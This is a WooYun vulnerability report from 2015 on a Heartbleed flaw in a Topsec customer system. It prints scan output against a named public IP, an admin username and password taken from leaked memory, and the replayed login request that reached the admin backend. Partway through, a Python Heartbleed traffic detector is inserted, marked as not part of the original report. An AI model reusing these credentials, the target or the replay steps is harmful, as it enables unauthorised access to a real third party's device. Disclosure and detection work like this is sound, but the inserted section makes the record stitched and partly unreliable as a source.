
Vulnerability summary (24 watching)

Defect ID: wooyun-2015-0116653

Title: Heartbleed on a 天融信 (Topsec) customer system (admin backend reached)

Affected vendor: 天融信 (Topsec)

Author:

Submitted: 2015-05-28 11:17

Fixed: 2015-07-12 15:58

Published: 2015-07-12 15:58

Vulnerability type: Disclosure of important sensitive information

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-05-28: Details sent to the vendor; awaiting vendor handling
2015-05-28: Vendor confirmed; details disclosed to the vendor only
2015-06-07: Details disclosed to core white hats and relevant domain experts
2015-06-17: Details disclosed to regular white hats
2015-06-27: Details disclosed to intern white hats
2015-07-12: Details disclosed to the public

Summary:

*

Details:

Target: https://125.76.228.15/

125.76.228.15:443 - Sending Heartbeat...
[*] 125.76.228.15:443 - Heartbeat response, 65535 bytes
[+] 125.76.228.15:443 - Heartbeat response with leak
[*] 125.76.228.15:443 - Printable info leaked: [65535-byte memory dump omitted]
[*] Scanned 1 of 1 hosts (100% complete)


Captured an account and password:
username=super&passwd=0F29l%3FTfW
Decoding it and attempting to log in failed.
https://125.76.228.15/cgi/maincgi.cgi?Url=MainFrame
Constructing the cookie by hand also failed.
So I captured the request and edited the packet data:

POST /cgi/maincgi.cgi?Url=Index HTTP/1.1
Host: 125.76.228.15
Connection: keep-alive
Content-Length: 52
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://125.76.228.15
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: https://125.76.228.15/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: session_id=; ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%226fcc1566f3ffa084a45203012e026fce%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22222.82.43.125%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F35.0.1916.153+Safari%2F537.36+SE+2.X+Met%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1432781299%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22secucode%22%3Bs%3A4%3A%22vvtf%22%3B%7Dce17c1307c85ce1cb5c5ac0f7ee84881
username=super&passwd=0F29l%3FTfW&loginSubmitIpt=%B5%C7%C2%BC


Login succeeded.
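The leak in the scan output above is produced by heartbeat requests whose declared payload length exceeds what was actually sent, answered by an oversized heartbeat response. As an added example (not part of the original report), the following Python check parses TLS records and flags both patterns the way an IDS rule would; the sample byte stream is constructed here, not taken from the capture.

```python
import struct

TLS_HEARTBEAT = 24      # TLS record content type for heartbeat (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16        # RFC 6520: padding must be at least 16 bytes


def parse_tls_records(data: bytes):
    """Split a raw TLS byte stream into (content_type, version, body) tuples."""
    records, off = [], 0
    while off + 5 <= len(data):
        ctype, ver, rlen = struct.unpack("!BHH", data[off:off + 5])
        body = data[off + 5:off + 5 + rlen]
        if len(body) < rlen:
            break  # truncated record at end of capture
        records.append((ctype, ver, body))
        off += 5 + rlen
    return records


def heartbeat_is_malformed(body: bytes) -> bool:
    """Heartbeat body is type(1) | payload_length(2) | payload | padding.
    The declared payload_length must fit inside the record with room for the
    padding; a request that claims more is the Heartbleed over-read pattern."""
    if len(body) < 3:
        return True
    _, plen = struct.unpack("!BH", body[:3])
    return 3 + plen + MIN_PADDING > len(body)


def find_heartbleed_indicators(stream: bytes, max_sane_response: int = 256):
    """Return (record_index, kind, declared_len, actual_len) for over-declared
    heartbeat requests and oversized responses (65535 bytes in the scan above)."""
    hits = []
    for i, (ctype, _ver, body) in enumerate(parse_tls_records(stream)):
        if ctype != TLS_HEARTBEAT or not body:
            continue
        declared = struct.unpack("!H", body[1:3])[0] if len(body) >= 3 else None
        if body[0] == HB_REQUEST and heartbeat_is_malformed(body):
            hits.append((i, "request", declared, len(body)))
        elif body[0] == HB_RESPONSE and len(body) > max_sane_response:
            hits.append((i, "response", declared, len(body)))
    return hits


# Constructed sample traffic (not a real capture): a well-formed heartbeat
# request, an application-data record, then a request declaring 65535 bytes
# of payload while carrying none.
BENIGN_HB = b"\x18\x03\x03\x00\x17" + b"\x01\x00\x04ping" + b"\x00" * 16
APP_DATA = b"\x17\x03\x03\x00\x05hello"
OVERREAD_HB = b"\x18\x03\x03\x00\x03" + b"\x01\xff\xff"
SAMPLE_STREAM = BENIGN_HB + APP_DATA + OVERREAD_HB
```

Running find_heartbleed_indicators(SAMPLE_STREAM) reports only the third record, with a declared length of 65535 against 3 bytes actually present.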


Proof of vulnerability:

As stated above.

Fix recommendation:

*

Copyright notice: please credit the source @乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 2

Confirmed: 2015-05-28 15:57

Vendor reply:

Thank you for your submission.

Latest status:

None yet